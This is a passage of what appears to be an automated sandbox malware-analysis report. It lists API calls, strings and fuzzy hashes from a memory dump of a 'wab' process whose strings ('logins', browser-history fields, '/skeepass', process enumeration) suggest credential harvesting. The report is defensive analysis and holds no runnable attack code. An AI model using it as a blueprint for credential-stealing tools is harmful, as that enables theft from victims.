                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 1043902810-0
                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                    • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
                                                    • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                  • memset.MSVCRT ref: 0040E380
                                                    • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                    • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                                                  • wcschr.MSVCRT ref: 0040E3B8
                                                  • memcpy.MSVCRT ref: 0040E3EC
                                                  • memcpy.MSVCRT ref: 0040E407
                                                  • memcpy.MSVCRT ref: 0040E422
                                                  • memcpy.MSVCRT ref: 0040E43D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                  • API String ID: 3073804840-2252543386
                                                  • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                  • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                  • API String ID: 2899246560-1542517562
                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040DBCD
                                                  • memset.MSVCRT ref: 0040DBE9
                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                  • API String ID: 3330709923-517860148
                                                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                  • memset.MSVCRT ref: 0040806A
                                                  • memset.MSVCRT ref: 0040807F
                                                  • _wtoi.MSVCRT ref: 004081AF
                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                  • memset.MSVCRT ref: 004081E4
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                    • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                  • String ID: logins$null
                                                  • API String ID: 3492182834-2163367763
                                                  • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                  • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                  • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                  • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • memset.MSVCRT ref: 004085CF
                                                  • memset.MSVCRT ref: 004085F1
                                                  • memset.MSVCRT ref: 00408606
                                                  • strcmp.MSVCRT ref: 00408645
                                                  • _mbscpy.MSVCRT ref: 004086DB
                                                  • _mbscpy.MSVCRT ref: 004086FA
                                                  • memset.MSVCRT ref: 0040870E
                                                  • strcmp.MSVCRT ref: 0040876B
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                  • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                  • String ID: ---
                                                  • API String ID: 3437578500-2854292027
                                                  • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                  • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                  • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                  • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0041087D
                                                  • memset.MSVCRT ref: 00410892
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                  • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                  • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                  • GetSysColor.USER32(0000000F), ref: 00410999
                                                  • DeleteObject.GDI32(?), ref: 004109D0
                                                  • DeleteObject.GDI32(?), ref: 004109D6
                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 1010922700-0
                                                  • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                  • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                  • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                  • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                  • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                  • malloc.MSVCRT ref: 004186B7
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                  • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                  • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                  • malloc.MSVCRT ref: 004186FE
                                                  • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??3@$FullNamePath$malloc$Version
                                                  • String ID: |A
                                                  • API String ID: 4233704886-1717621600
                                                  • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                  • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                  • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                  • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _wcsicmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  • API String ID: 2081463915-1959339147
                                                  • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                  • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                  • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                  • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                    • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                    • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                    • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                    • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                  • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                  • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                  • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                  • API String ID: 2012295524-70141382
                                                  • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                  • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                  • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                  • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                  • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                  • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                  • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                  • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                  • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                  • API String ID: 667068680-3953557276
                                                  • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                  • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                  • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                  • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                  • memcpy.MSVCRT ref: 0041234D
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                  • String ID:
                                                  • API String ID: 1700100422-0
                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                  • String ID:
                                                  • API String ID: 552707033-0
                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,?,?,?,0040C255,?,?,*.*,0040C2BF,00000000), ref: 0040C0A4
                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                  • memcpy.MSVCRT ref: 0040C11B
                                                  • strchr.MSVCRT ref: 0040C140
                                                  • strchr.MSVCRT ref: 0040C151
                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                  • memset.MSVCRT ref: 0040C17A
                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: File$memcpystrchr$CloseCreateHandlePointerSize_memicmp_strlwrmemset
                                                  • String ID: 4$h
                                                  • API String ID: 4066021378-1856150674
                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$_snwprintf
                                                  • String ID: %%0.%df
                                                  • API String ID: 3473751417-763548558
                                                  • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                  • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                  • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                  • GetParent.USER32(?), ref: 00406136
                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000009.00000002.2292478168.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                  • String ID: A
                                                  • API String ID: 2892645895-3554254475
                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                    • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                    • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                    • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                    • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                  • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                  • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                  • GetDesktopWindow.USER32 ref: 0040D9FD
                                                  • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                  • memset.MSVCRT ref: 0040DA23
                                                  • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
